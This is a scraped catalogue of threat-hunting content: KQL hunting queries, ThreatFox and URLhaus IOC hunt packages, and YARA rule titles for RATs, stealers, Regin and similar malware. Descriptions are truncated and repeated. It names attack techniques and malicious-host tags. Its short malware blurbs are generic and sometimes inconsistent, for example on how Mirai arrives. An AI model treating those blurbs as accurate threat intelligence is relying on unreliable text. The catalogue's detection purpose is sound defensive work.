ThreatFox: Brute Ratel C4 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Brute Ratel C4
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a Remote Access Trojan that enables adversaries to exfiltrate data, execute commands, and maintain persistence within compromised systems. It typically arrives via phishing emails containing malicious attachments or exploit kits
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with NetSupportManager RAT
ThreatFox: PureLogs Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with PureLogs Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Remcos
ThreatFox: Tofsee IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Tofsee
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 23 IOCs associated with VShell
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
XWorm is
URI requests from single client
kql low
T1190
W3CIISLog
'This finds connections to server files requested by only one client. Effective when actor uses static operational IP addresses. Threshold can be modified. Larger execution window increases reliabilit
URLhaus: 176-65-139-121 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as 176-65-139-121
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as 32-bit
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
ClearFake malware is designed to exfiltrate sensitive data and establish command-and-control (C2) communication, often leveraging
URLhaus: dropped-by-Phorpiex Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as dropped-by-Phorpiex
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as exe
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as Mozi
User Accounts - Blocked Accounts
kql medium
T1078
AADNonInteractiveUserSignInLogsSigninLogs
'An account could be blocked/locked out due to multiple reasons. This hunting query summarize blocked/lockout accounts and checks if most recent signin events for them is after last blocked accounts R
User Accounts - Successful Sign in Spikes
kql medium
T1078.004
AADNonInteractiveUserSignInLogsSigninLogs
' Identifies measureable increase in successful sign-ins from user accounts. Spike is determined based on Time series anomaly which will look at historical baseline values. Ref : https://docs.microsof
T1078
'Query identifies users denied registration for multiple webinars or recordings but successfully registered for at least one event. Threshold variable adjusts number of events user needs to be rejecte
T1552
SecurityEvent
'This detection uses Windows security events to look for users reading the local Device Identity Key (Machine Key). This information can be correlated with other events for additional context and get
Windows System Shutdown/Reboot(Sysmon)
kql medium
T1529
'This detection uses Sysmon telemetry to detect System Shutdown/Reboot (MITRE Technique: T1529)'
Zoom room high CPU alerts
kql medium
T1542
'This hunting query identifies Zoom room systems with high CPU alerts that may be a sign of device compromise.'
AD Account Lockout
kql medium
T1531
SecurityEvent
'Detects Active Directory account lockouts'
AD FS Database Local SQL Statements
kql medium
T1005
'This hunting query uses Application events from the "MSSQL$MICROSOFT##WID" provider to collect SQL statements run against an AD FS database (e.g Windows Internal Database (WID)). A threat actor might
Alerts On Host
kql medium
SecurityAlert
'Any Alerts that fired on a given host during the range of +6h and -3d'
Alerts related to account
kql medium
SecurityAlert
'Any Alerts that fired related to a given account during the range of +6h and -3d'
Alerts related to File
kql medium
SecurityAlert
'Any Alerts that fired related to a given File during the range of +6h and -3d'
Alerts related to IP
kql medium
SecurityAlert
'Any Alerts that fired related to a given IpAddress during the range of +6h and -3d'
Alerts With This Process
kql medium
SecurityAlert
'Any Alerts that fired on any host with this same process in the range of +-1d'
Rule to detect ProjectSauron encrypted LSA samples
Rule to detect encrypted ProjectSauron SSPI samples
Rule to detect ProjectSauron generic pipe backdoors
The YARA rule 'apt_ProjectSauron_pipe_backdoor' detects malicious
Rule to detect Regin 32 bit stage 1 loaders
Rule to detect Regin 64 bit stage 1 loaders
Rule to detect Regin disp.dll dispatcher
Rule to detect Regin's Hopscotch module
Rule to detect Regin's Legspin module
Rule to detect Regin RC5 decryption keys
Rule to detect Regin VFSes
yara low
Rule to detect Regin VFSes
T1190
SecurityAlertW3CIISLog
'This query will dynamically identify Exchange servers using common web paths used by the application in the csUriStem. The query will then collect MDE alerts from the SecurityAlert table using the id
External IP address in Command Line
kql medium
T1041T1071
SecurityEvent
'This query looks for command lines that contain a public IP address. Attackers may use a hard coded IP for C2 or exfiltration. This query can be filtered to exclude network prefixes that are known
Failed Login Attempt by Expired account
kql medium
T1078
SecurityEventSigninLogs
'This query looks at Account Logon events found through Windows Event Id's as well as SigninLogs to discover login attempts by accounts that have expired.'
T1110
AuditLogsSigninLogs
'User account failed to logon in current period. Excludes Windows Sign in attempts and limits to only more than 10 failed logons or 3 different IPs used. Results may indicate a potential malicious use
Fake computer account authentication attempt
kql medium
T1564
SecurityEvent
'This query detects authentication attempt from a fake computer account(username ends with $). Computer accounts are normally not authenticating via interactive logon or remote desktop neither they a
T1071.001
CommonSecurityLog
'This composite hunting query will highlight any HTTP traffic in CommonSecurityLog web proxies (such as ZScaler) that match known patterns used by red teaming tools potentially stolen from FireEye. Mo
T1556
AuditLogsSigninLogs
This query shows authentication methods being added and devices registered around the time of a high risk sign in which could indicate an attempt to establish persistence on a compromised account. The
Integrate Purview with Cloud App Events
kql medium
T1074
CloudAppEventsSecurityAlert
"This query searches for any files in Cloud App Events that have trigger a security alert."
T1484
SecurityEvent
'This query detects lateral movement using GPO scheduled task usually used to deploy ransomware at scale. It monitors whether a scheduled task is modified within the Sysvol folder in GPO. Ref: https
Red Leaves malware, related to APT10
yara low
Red Leaves malware, related to APT10
Red Leaves C&C left in memory, use with Volatility / Rekall
T1114T1020T1078
OfficeActivitySigninLogs
'This query helps detect new Microsoft Entra ID sign in from a new location correlating with Office Activity data highlighting cases where user mails are being forwarded and shows if it is being forw
T1110
OfficeActivitySigninLogs
'This identifies failed logon attempts using permutations based on known first and last names within 10m time windows. Iteration through separators or order changes in the logon name may indicate pote
T1074.001
DeviceProcessEventsSecurityEventWindowsEventimProcessCreate
'This hunting query looks for potential command injection attempts via the vulnerable third-party driver against Azure IR with Managed VNet or SHIR processes as well as post-exploitation activity base
Potential SSH Tunnel to AAD Connect Host
kql medium
T1133
'Azure AD Connect (AAD Connect) is a critical service that handles connections between on-premise Active Directory and Azure AD. Due to the critical nature of AAD Connect threat actors may attempt to
Privileged Account Password Changes
kql medium
T1078.004
AuditLogsBehaviorAnalyticsIdentityInfo
'Identifies where Privileged Accounts have updated passwords or security information. This is joined with UEBA alerts to filter to only those accounts with a high investigation priority. Ref : https:/
Privileged Accounts Locked Out
kql medium
T1078.004
IdentityInfoSigninLogs
'Identifies privileged accounts that have been locked out. Verify these lockout are due to legitimate user activity and not due to threat actors attempting to access the accounts. Ref : https://docs.m
Rare domains seen in Cloud Logs
kql medium
T1190T1087T1114
AuditLogsOfficeActivitySigninLogs
'This script identifies rare domain accounts accessing cloud resources by examining logs. You can lower the domainLimit value to see domains with fewer access attempts. For example, set domainLimit =
T1204
DeviceProcessEventsSecurityEvent
This query will show rare firewall rule changes using netsh utility by comparing rule names and program names from the previous day with those from the historical chosen time frame. - This technique w
RareDNSLookupWithDataTransfer
kql medium
T1071T1048
CommonSecurityLogDnsEventsVMConnection
'This query helps identify rare DNS connections and resulting data transfer to/from the associated domain. It can help identify unexpected large data transfers to or from internal systems which may in
T1190T1078
SecurityAlertSecurityEvent
'This query looks at correlating different reconnaissance alerts with interactive logon logs to help analysts investigate initial possible compromise activity'
Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2
Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2
Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2
Auto-generated rule - file-3665415_sys
Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin
Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129
yara low
Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129
Auto-generated rule - file SHF-000052 and ndisips.sys
Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935
Detects svcstat from Regin report - file svcsstat.exe_sample
Scieron
yara low
YARA rule: Scieron
T1098.001T1528
AuditLogs
Identifies service principal sign-ins occurring within 30 minutes of a credential addition to the same service principal. The tight correlation is consistent with post-compromise staging where credent
T1110.003T1078
AADNonInteractiveUserSignInLogsSigninLogs
Hunt for IP addresses that fail sign-ins against multiple identities and then authenticate successfully within a short time window. This can highlight password spraying or credential misuse patterns a
T1550.001T1539
AADNonInteractiveUserSignInLogsSigninLogs
Identify successful sign-ins where a non-interactive sign-in for the same user occurs within 10 minutes from a different ASN and IP than the interactive sign-in. This pattern can indicate post-comprom
T1190T1078
AuditLogsCommonSecurityLogSecurityAlert
'This query combines different SQL alerts with CommonSecurityLogs and AuditLogs helping analysts /investigate any possible SQL related attacks faster thus reducing Mean Time To Respond'
Storage Account Key Enumeration
kql medium
T1586T1570
AuditLogsAzureActivitySigninLogs
'This query identifies attackers trying to enumerate the Storage keys as well as updating roles using AzureActivity,SigninLogs and AuditLogs'
T1586T1570
CommonSecurityLogSecurityAlert
'This query combines different Storage alerts with CommonSecurityLogs and StorageLogs helping analysts triage and investigate any possible Storage related attacks faster thus reducing Mean Time To R
T1190T1078
AuditLogsCommonSecurityLogSecurityAlert
'This query combines different Storage alerts with CommonSecurityLogs and AuditLogs helping analysts investigate any possible storage related attacks faster thus reducing Mean Time To Respond'
T1078T1087
AuditLogsSigninLogs
'This hunting query will help detect successful sign-ins from devices that are marked non-compliant along with bulk download activity. Attackers may attempt to get a list of accounts, groups, registra
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network scans targeting unpatched devices on specific IP:port combinations, often leveraging open ports like 23 (Tel
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 11 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 14 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 11 IOCs associated with KongTuke
ThreatFox: magecart IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 24 IOCs associated with magecart
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 20 IOCs associated with Unknown malware
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Unknown RAT
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 3 IOCs associated with Unknown Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 22 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 14 IOCs associated with Cobalt Strike
ThreatFox: CountLoader IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with CountLoader
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a remote access Trojan that enables attackers to exfiltrate data and execute commands on infected systems. It typically arrives via compromised networks or phishing emails, leveraging IP:port connections to establish command-and-control communication. SOC analysts should monitor for unusual outbound
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 13 IOCs associated with Remcos
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Sliver
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information by leveraging compromised credentials to access and exfiltrate
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 119 IOCs associated with VShell
Tracking Password Changes
kql medium
T1078T1110
AuditLogsOfficeActivitySecurityEventSigninLogsSyslogWindowsEvent
'This script identifies password changes or resets across multiple host and cloud sources. Account manipulation, including password changes and resets, may help adversaries maintain access to credenti
Tracking Privileged Account Rare Activity
kql medium
T1078T1087
OfficeActivitySecurityAlertSecurityEventSigninLogsW3CIISLog
'This query determines rare activity by a high-value account on a system or service. If any account with rare activity is found, the query retrieves related activity from that account on the same day
T1190T1078
AuditLogsSecurityAlertSigninLogs
'This query looks for unfamiliar Sign-in's thats not seen recently for the given user with azure portal login attempts and audit logs to help detect and reduce the analysis timeline for defenders'
URLhaus: 134-209-188-142 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 134-209-188-142
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 57 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as arm
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "ascii" malware family is a downloader that exfiltrates data and establishes command-and-control (C2) communication
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as malware_download
URLhaus: MassLogger Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as MassLogger
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as Mozi
URLhaus: PureHVNC Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as PureHVNC
User Granted Access and created resources
kql medium
T1098T1078T1496
AuditLogsAzureActivity
'Identifies when a new user is granted access and starts creating resources in Azure. This can help you identify rogue or malicious user behavior.'
Web shell command alert enrichment
kql medium
SecurityAlertW3CIISLog
'Extracts MDATP Alerts that indicate a command was executed by a web shell. Uses time window based querying to idneitfy the potential web shell location on the server, then enriches with Attacker IP a
Web shell file alert enrichment
kql medium
SecurityAlertW3CIISLog
'Extracts MDATP Alert for a web shell being placed on the server and then enriches this event with information from W3CIISLog to idnetigy the Attacker that placed the shell'
T1496
AzureActivity
'Indicates when an anomalous number of resources are created in Azure via AzureActivity log. Resource creation could indicate malicious or spurious use of your Azure Resource allocation.'
Anomolous Sign Ins Based on Time
kql medium
T1078.004
IdentityInfoSigninLogs
'Identifies anomolies in signin events based on the volume of signin events over time. Use this to identify suspicious authentication patterns such as spikes in activity or out of hours events. Ref :
Azure VM Run Command linked with MDE
kql medium
T1570T1078.004
AzureActivityDeviceEventsDeviceFileEvents
'Identifies any Azure VM Run Command operations and links these operations with MDE host logging. Linking these two data sources provides hunting opportunities. Logging from AzureActivity provides the
Connectivity Failures by Device
kql medium
DeviceNetworkEvents
This query checks for network connection failures to Microsoft Defender for Endpoint URLs. The output includes any device with 1+ connectivity failures, a list of the domains they failed to connect to
Connectivity Failures by Domain
kql medium
DeviceNetworkEvents
This query is designed to help troubleshoot connectivity issues to Microsoft Defender for Endpoint URLs. It provides a summary of the number of failures which occurred, the number of distinct machines
Critical user management operations followed by disabling of System Restore from admin account
kql medium
T1078T1490
AuditLogsDeviceProcessEventsIdentityInfoSecurityEventWindowsEvent
'This query could identify critical user management operations like user registration(Microsoft Entra ID Multi-Factor Authentication & self-service password reset (SSPR)) authentication by admin accou
This advanced hunting query detects CISA Alert (AA22-117A) 2021 Top Routinely Exploited Vulnerabilities https://www.cisa.gov/uscert/ncas/alerts/aa22-117a
DeviceFileEvents
// Author: jan geisbauer // @janvonkirchheim // ------------------------ // 1. A list of all devices that have this vulnerability // 2. A list of all users that uses those devices // 3. If these users
devices_with_vuln_and_users_received_payload
kql medium
EmailAttachmentInfoIdentityInfo
// Author: jan geisbauer // @janvonkirchheim // ------------------------ // 1. A list of all devices that have this vulnerability // 2. A list of all users that uses those devices // 3. If these users
T1098
AuditLogsSigninLogs
'This query look for Service Principal accounts that are no longer used where a user has added or updated credentials for them before logging in with the Service Principal. Threat actors may look to
Dormant User Update MFA and Logs In
kql medium
T1098
AuditLogsSigninLogs
'This querys look for users accounts that have not been successfully logged into recently, who then have a MFA method added or updated before logging in. Threat actors may look to re-activate dormant
Dormant User Update MFA and Logs In - UEBA
kql medium
T1098
AuditLogsBehaviorAnalyticsSigninLogs
'This query look for accounts that have not been successfully logged into recently who then add or update an MFA method before logging in. Threat actors may look to re-activate dormant accounts and us
Download of New File Using Curl
kql medium
T1071
DeviceNetworkEventsSecurityEvent
'Threat actors may use tools such as Curl to download additional files, communicate with C2 infrastructure, or exfiltrate data. This query looks for new files being downloaded using Curl. Curl also ha
Microsoft Defender AV details
kql medium
'This query will identify the Microsoft Defender Antivirus Security Intelligence version, Security Intelligence up to date value, Engine version, Engine up to date value, Product version (aka Platfor
Microsoft Defender AV Engine up to date info
kql medium
'Provides the Engine version and total count of up to date devices, not up to date devices and count of devices whose status is not available relevant to the Engine version.'
Microsoft Defender AV mode device count
kql medium
'Provides the Anti virus mode and device count falling under that AV mode.'
'Provides the Platform version and total count of up to date devices, not up to date devices and count of devices whose status is not available relevant to the Platform version.'
'Provides the Security Intelligence version and total count of up to date devices, not up to date devices and count of devices whose status is not available relevant to the security intelligence versi
Prikormka
yara low
YARA rule: Prikormka
PrikormkaDropper
yara low
The YARA rule 'PrikormkaDropper' detects a potential malicious dro
PrikormkaEarlyVersion
yara low
YARA rule: PrikormkaEarlyVersion
PrikormkaModule
yara low
YARA rule: PrikormkaModule
Privileged Accounts - Failed MFA
kql medium
T1078.004
AADNonInteractiveUserSignInLogsIdentityInfoSigninLogs
' Identifies failed MFA attempts from Privileged accounts. Privileged accounts list can be based on IdentityInfo UEBA table or built-in watchlist. Ref : https://docs.microsoft.com/azure/active-directo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Kimwolf malware operates as a backdoor, enabling remote command execution and data exfiltration via encrypted C2 channels over IP:port pairs. It typically arrives through phishing emails with malicious attachments or exploit kits leveraging zero-day vulnerabilities. SOC analysts should monitor for unusual outbound traffic patterns, lateral movement indicators, and signs of persistence beyond the listed IOCs.
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via phishing emails, malicious websites
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 3 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 82 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with FAKEUPDATES
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Unknown malware
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
AsyncRAT is a remote access Trojan that enables attackers to execute commands, steal data, and maintain persistent control over infected systems. It typically arrives via phishing emails, malicious attachments, or exploit kits, leveraging IP:port pairs for command-and-control communication. SOC analysts should monitor for unusual outbound traffic to listed IPs/ports, signs
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with DCRat
ThreatFox: Eye Pyramid IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Eye Pyramid
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 6 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Remcos
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with SectopRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting banking credentials and system information
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 33 IOCs associated with VShell
Trojan Win32 Plabit
yara low
YARA rule: Trojan_Win32_Plabit
Dipsind variant
yara low
Dipsind variant
Dipsind variant
yara low
Dipsind variant
Installer for Dipsind variant
yara low
Installer for Dipsind variant
Zc tool
yara low
Zc tool
Zc tool v2
yara low
Zc tool v2
Injector / loader component
yara low
Injector / loader component
JPin backdoor
yara low
JPin backdoor
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 67 malicious URLs tagged as 32-bit
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as ClearFake
Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF)
Misdat Backdoor
yara low
YARA rule: Misdat_Backdoor
Misdat Backdoor Packed
yara low
The "Misdat_Backdoor_Packed" YARA rule detects potential malicious payloads associated with the Misdat back
MiSType Backdoor Packed
yara low
YARA rule: MiSType_Backdoor_Packed
CCProxy config known from Operation Cleaver
Potao
yara low
The 'Potao' YARA rule detects potential malicious artifacts or indicators associated with the name 'Potao', likely targeting specific threat actors or campaigns. SOC teams should deploy this rule in endpoint EDR scanning
PotaoDecoy
yara low
YARA rule: PotaoDecoy
PotaoDll
yara low
YARA rule: PotaoDll
PotaoSecondStage
yara low
YARA rule: PotaoSecondStage
PotaoUSB
yara low
YARA rule: PotaoUSB
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
